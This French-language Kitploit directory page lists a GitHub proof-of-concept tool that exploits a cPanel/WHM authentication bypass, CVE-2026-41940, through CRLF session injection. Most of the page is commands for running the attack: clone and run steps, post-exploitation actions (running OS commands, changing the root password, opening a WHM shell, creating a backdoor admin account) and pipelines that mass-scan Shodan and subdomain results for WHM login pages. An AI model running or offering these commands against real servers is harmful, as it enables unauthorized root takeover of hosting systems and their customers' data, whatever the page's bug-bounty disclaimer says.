Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2026-41940-PoC — Exploite le contournement d'authentification cPanel/WHM CVE-2026-41940 via l'injection de session CRLF pour un accès WHM au niveau racine non authentifié, puis liste les comptes, exécute des commandes système et ouvre un shell interactif pour des tests autorisés. | Kitploit
Outils/GitHubGitHub/lanicer/cve-2026-41940-poc
Authentification et AutorisationEscalade de PrivilègesScanners de VulnérabilitésMécanismes de PersistanceAnalyse des VulnérabilitésExploitation d'Applications WebPost-ExploitationTests d'Intrusion

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHublanicer/cve-2026-41940-poc

cve-2026-41940-PoC

Exploite le contournement d'authentification cPanel/WHM CVE-2026-41940 via l'injection de session CRLF pour un accès WHM au niveau racine non authentifié, puis liste les comptes, exécute des commandes système et ouvre un shell interactif pour des tests autorisés.

Voir le dépôt
5329713il y a 2 joursVérifié par Kitploit
Partager

CVE-2026-41940

⚠ Cet outil est créé uniquement à des fins éducatives ou de bug bounty. Toute utilisation non autorisée en dehors d'environnements contrôlés est strictement interdite.

Description

Un outil pour exploiter CVE-2026-41940, un contournement d'authentification critique dans cPanel & WHM (CVSS 10.0), permettant à des attaquants non authentifiés d'obtenir un accès WHM de niveau root en injectant des séquences CRLF dans les fichiers de session côté serveur via l'en-tête Authorization — sans aucune identification requise.

Comment ça fonctionne

CVE-2026-41940, en termes généraux, est exploitée par une défaillance dans la manière dont le système gère les sessions d'authentification dans cPanel/WHM. L'attaque commence généralement par une requête normale vers l'interface de connexion, où l'application initialise prématurément une session avant de valider complètement les identifiants de l'utilisateur. En raison d'une gestion inappropriée des entrées liées aux sessions, certaines structures d'entrée conçues ou inattendues peuvent modifier la façon dont les données de session sont stockées ou interprétées par le serveur.

Versions concernées

VersionVulnérableCorrigée
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

Installation(Windows/Mac OS)🔄

root@kitploit:~
git clone https://github.com/lanicer/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python cve.py
# MacOS/Linux
python3 cve.py

Comment utiliser

L'outil attend qu'un domaine cible soit spécifié.

Mode cible unique :

root@kitploit:~
python cve.py -u https://target1.com:2083

Vous pouvez également lancer un scan depuis le fichier target.txt (créez-le) :

root@kitploit:~
python cve.py -l target.txt -t 50 -o result.json

Scan de base :

Commandes disponibles :

root@kitploit:~
python cve.py -u https://victim1.com:2083 # single target scan
python cve.py info -u https://victim1.com:2083 # Retrieves system information (version, load, disk usage).
python cve.py host -u https://victim1.com:2083 # Retrieves the hostname of the target server.

Actions post-exploitation

root@kitploit:~
# List all accounts on the server
python cve.py list -u https://target.com:2087

# OS command
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"

# Get server info (hostname, disk, MySQL host)
python cve.py info -u https://target.com:2087

# Change root password
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# Interactive WHM shell
python cve.py shell -u https://target.com:2087

Pipelines

root@kitploit:~
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python cve.py scan -t 40 -o results.json

# From scope list
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python cve.py scan -t 30 -o results.json

# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python cve.py -t 30 -o shodan_results.json

# Multiple sources combined
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python cve.py -t 20 --action list

Mode shell WHM

Après une exécution réussie, vous pouvez ouvrir un shell WHM interactif :

root@kitploit:~
python cve.py shell -u

Toutes les commandes du shell


Référence CLI

root@kitploit:~
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors

Avertissement

⚠ Cet outil est créé uniquement à des fins éducatives ou de bug bounty. Toute utilisation non autorisée en dehors d'environnements contrôlés est strictement interdite.

Télécharger l’outil
CommandeDescription
idAfficher l'ID utilisateur
hostnameObtenir le nom d'hôte du serveur
accountsLister tous les comptes utilisateur
infoCharge, disque, hôte MySQL, version
cat <path>Lire le contenu d'un fichier
exec <cmd>Exécuter une commande OS
newadmin <user> <pass>Créer un admin WHM backdoor
passwd <pass>Changer le mot de passe root
l [path]Lister le répertoire
helpAfficher toutes les commandes
exitQuitter le mode shell